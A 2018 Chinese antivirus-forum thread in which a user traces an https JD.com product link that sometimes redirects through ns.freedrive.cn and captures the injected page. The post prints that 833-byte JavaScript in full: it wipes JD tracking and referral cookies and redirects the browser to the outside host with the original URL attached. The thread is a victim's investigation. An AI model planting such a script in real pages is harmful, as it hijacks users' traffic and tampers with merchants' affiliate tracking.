查看: 2621|回复: 2
收起左侧

[其他] https劫持?

[复制链接]
随便注册
发表于 2018-8-11 23:41:01 | 显示全部楼层 |阅读模式
本帖最后由 随便注册 于 2018-8-16 17:36 编辑

其它浏览器调用IE打开网址:https://item.jd.com/**********.html

IE被劫持至:https://ns.freedrive.cn/?s=**********&g=https://item.jd.com/**********.html

没能复现

https是怎么劫持到**********.html地址的?排查本机无果,搜了搜有遇到这个的,但都是http的网址被劫持。难道是京东的证书对运营商不保密?
不知道到期后的会怎样,看是上交还是泄露
1.png

==================
20180814又出现了,并且重现一次,抓到一点过程

全部是https,由于两次都是跳的商品页面,所以先用IE打开店铺页面,从这里不停打开具体的商品页面,终于有一次网站响应不对劲,然后就跳了。哪个商品页面才833字节?之后又试了几十次,不能重现。

浏览器请求
GET /******.html HTTP/1.1

网站响应
Content-Length: 833

浏览器请求
CONNECT ns.freedrive.cn:443 HTTP/1.0

==================
20180816
抓住代码了,833字节,那么就确认不是本机问题。虽然该js不需要知道具体的**********.html地址,但篡改https内容,要么出了大漏洞,要么京东证书漏了或密钥被利用了。
还一种可能,这个网址跳转了能赚钱?京东自己干的?
『求救』京东网址出现“尾巴”(京东确认是他们的问题,现已恢复。此帖结束)_病毒救援区_安全区 卡饭论坛 - 互助分享 - 大气谦和!
https://bbs.kafan.cn/thread-2113223-1-1.html
  1. <!DOCTYPE html><html><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0"><meta name="referrer" content="never"><title></title></head><body><script type="text/javascript">try {var u = "https://ns.freedrive.cn?s=0039CDECC&g="+window.location.href;var im = /(iPad|iPhone|Mobile|Android)/i.test(navigator.userAgent);if(im){u = "https://ns.freedrive.cn?s=0039CDECC&g="+window.location.href;}var domain = location.host.substr(location.host.indexOf("."));var al = ["__jda", "__jdb", "__jdc", "__jdv", "__jdu", "CCC_SE", "unpl"];for (var i = 0; i < 7; i++) {document.cookie = al[i] + "=;expires=Thu, 01 Jan 2010 00:00:00 GMT; path=/; domain=" + domain;}window.location.href = u;} catch(e) {window.location.href = u;}</script></body></html>
复制代码


——————————————————
楼主没明确说京东链接是不是https
点击某东的商品链接,却出现这个网站,提示不安全,电脑中毒了吗【firefox吧】_百度贴吧
http://tieba.baidu.com/p/5719477483
歌德塔大蜘蛛
发表于 2018-8-12 08:25:34 | 显示全部楼层
Eif-Hill
头像被屏蔽
发表于 2018-8-12 11:09:39 | 显示全部楼层
抓包,抓包·····
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-23 13:09 , Processed in 0.126533 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表